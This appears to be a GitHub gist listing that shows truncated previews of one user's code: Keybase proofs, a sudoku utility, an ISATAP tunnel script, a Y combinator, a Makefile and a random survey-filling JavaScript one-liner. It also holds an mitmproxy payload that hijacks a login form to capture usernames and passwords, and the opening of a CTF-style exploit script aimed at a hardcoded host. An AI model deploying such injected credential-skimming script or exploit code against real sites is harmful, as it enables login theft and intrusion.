I hereby claim:
- I am vuryleo on github.
- I am vuryleo (https://keybase.io/vuryleo) on keybase.
- I have a public key whose fingerprint is DC8A BB5D 55DE 1A7E 7BB0 D29E B0F1 75EF 864E DB26
To claim this, I am signing this object:
#!/usr/bin/python3.3 | |
import sys | |
import argparse | |
import random | |
import copy | |
parser = argparse.ArgumentParser(description='Sudoku Utility.') | |
parser.add_argument('inStream', metavar='inStream', type=str, nargs='?', help='input stream.') | |
parser.add_argument('outStream', metavar='outStream', type=str, nargs='?', help='output stream.') | |
parser.add_argument('-g', '--generate', action='store_true', help='generate a sudoku other than solve') |
#!/usr/bin/env ruby | |
require 'algorithms' | |
class TrueClass | |
def to_i | |
1 | |
end | |
end |
#!/bin/sh | |
LAN_IP=`/sbin/ifconfig $1 | grep inet | grep -v inet6 | awk '{print $2}'` | |
WAN_IP=`/sbin/ifconfig $1 | grep inet | grep -v inet6 | awk '{print $2}'` | |
#LAN_IP=59.66.0.0 | |
#WAN_IP=59.66.0.0 # replace with your wan ip | |
# just for Tsinghua's ISATAP router | |
echo $LAN_IP | |
route delete -inet6 default | |
/sbin/ifconfig gif0 tunnel $LAN_IP isatap.tsinghua.edu.cn |
Y = (F) -> | |
((x) -> | |
F((y) -> | |
(x(x))(y)))( | |
(x) -> | |
F((y) -> | |
(x(x))(y)) | |
) | |
FactGen = (fact) -> | |
(n) -> |
a=0;b=2;trl = document.getElementsByTagName("tr");for(var i = 0; i < trl.length; i ++){pl = trl[i].getElementsByTagName("input"); if (pl.length==5){pl[parseInt(Math.random()*(b-a))+a].checked=true;}};document.getElementsByTagName("input")[100].click(); |
# | |
# $File: Makefile | |
# $Date: Tue Apr 15 22:29:46 2014 +0800 | |
# | |
# A single output portable Makefile for | |
# simple c project | |
OBJ_DIR = obj | |
LIB_DIR = lib | |
BIN_DIR = bin |
I hereby claim:
To claim this, I am signing this object:
from libmproxy.encoding import * | |
payload = """ | |
<script> | |
$('#login_form').attr('onsubmit', 'xss();return false'); | |
var xss = function () { | |
console.log($('#pass').val()); | |
$.cookie('xss', '' + $('#uname').val() + ':' + $('#pass').val(), {path: '/cgi-bin/do_login', expires: 42}) | |
do_login() | |
}; |
import time | |
import struct | |
from zio import * | |
io = zio(('166.111.132.132', 1234)) | |
#io = zio(('localhost', 1234)) | |
timeout = 1000 * 1000 | |
buf = 0x0804a10c |
package main | |
import ( | |
"bufio" | |
"errors" | |
"fmt" | |
"io" | |
"os" | |
"strings" | |
) |